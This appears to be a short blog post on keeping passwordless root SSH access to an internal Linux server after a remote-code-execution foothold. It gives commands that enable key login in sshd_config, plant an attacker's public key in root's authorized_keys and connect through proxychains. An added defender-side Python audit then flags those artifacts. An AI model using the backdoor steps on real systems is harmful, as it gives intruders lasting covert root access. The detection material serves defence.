Passwordless login to an internal Linux server through a proxy

  Scenario: commands can be executed with root privileges through an RCE, but the password cannot be read

 

1: On the victim machine, run the following commands to enable public-key authentication

# echo RSAAuthentication yes >> /etc/ssh/sshd_config
# echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
# systemctl restart sshd

  

2: Back on the local Linux machine, generate a key pair

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
# ls -al /root/.ssh/
# cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
# mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys

  

3: On the victim machine, append the public key

# echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys

  

4: On the local machine, connect through the proxy

proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28
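
Seen from the defender's side, steps 1 and 3 leave two artifacts on the server: keywords appended to the end of sshd_config (including RSAAuthentication, a deprecated SSH protocol 1 keyword) and an extra line in /root/.ssh/authorized_keys. The following audit is an added example, not part of the original post; the function names, the allowlist and all sample file contents are constructed assumptions.

```python
import base64, hashlib, shlex

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")
WATCHED = {"pubkeyauthentication", "rsaauthentication", "permitrootlogin", "authorizedkeysfile"}

def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def audit_sshd_config(text):
    """Flag deprecated/repeated keywords left by `echo ... >>` (file treated as flat, no Match)."""
    findings, first_seen = [], {}
    for no, line in enumerate(text.splitlines(), 1):
        words = line.split("#", 1)[0].split()
        key = words[0].lower() if words else ""
        if key not in WATCHED:
            continue
        if key == "rsaauthentication":
            findings.append((no, "deprecated keyword RSAAuthentication"))
        if key in first_seen:
            findings.append((no, f"{words[0]} repeats line {first_seen[key]}"))
        first_seen.setdefault(key, no)
    return findings

def audit_authorized_keys(text, allowed):
    """Return (line, key type, fingerprint, comment) for every key not in the allowlist."""
    unknown = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        lex = shlex.shlex(line, posix=True)  # leading options may hold quoted spaces
        lex.whitespace_split, lex.quotes, lex.commenters = True, '"', ""
        tok = list(lex)
        i = next((n for n, t in enumerate(tok) if t.startswith(KEY_TYPES)), None)
        if i is None or i + 1 >= len(tok):
            continue
        fp = fingerprint(tok[i + 1])
        if fp not in allowed:
            unknown.append((no, tok[i], fp, " ".join(tok[i + 2:])))
    return unknown

# Constructed sample data: placeholder blobs, not real keys.
ADMIN = base64.b64encode(b"constructed-admin-key").decode()
ADDED = base64.b64encode(b"constructed-unknown-key").decode()
SAMPLE_CONFIG = "Port 22\nPubkeyAuthentication yes\nRSAAuthentication yes\nPubkeyAuthentication yes\n"
SAMPLE_KEYS = f'from="10.0.0.5" ssh-ed25519 {ADMIN} admin@bastion\nssh-rsa {ADDED} root@Riter\n'
ALLOWED = {fingerprint(ADMIN)}
if __name__ == "__main__":
    print(audit_sshd_config(SAMPLE_CONFIG), audit_authorized_keys(SAMPLE_KEYS, ALLOWED))
```

On a real host, feed the functions the contents of /etc/ssh/sshd_config and each account's authorized_keys, and build the allowlist from the fingerprints printed by `ssh-keygen -lf` for keys you have approved.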

  

posted @ 2021-04-05 23:13  BuXuan